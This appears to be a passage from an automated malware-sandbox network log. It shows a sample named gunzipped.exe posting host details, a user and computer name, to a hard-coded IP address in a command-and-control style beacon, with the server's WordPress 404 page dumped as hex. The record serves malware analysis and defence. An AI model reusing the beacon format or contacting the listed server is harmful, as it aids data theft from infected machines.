                          Apr 17, 2024 03:17:04.104511023 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:04.104554892 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:04.104598045 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:04.104636908 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:04.104676962 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:04.104712963 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:04.104753017 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.549714136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:04.956656933 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:05.164978981 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:06.781816959 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:05 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:06.781882048 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:06.781920910 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:06.781960011 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:06.781997919 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:06.782037020 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:06.782074928 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:06.782119036 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:06.782155991 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:06.782196999 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.549716136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:07.139175892 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:07.347666025 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:08.247116089 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:07 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:08.247153044 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:08.247193098 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:08.247230053 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:08.247416019 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:08.247453928 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:08.247489929 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
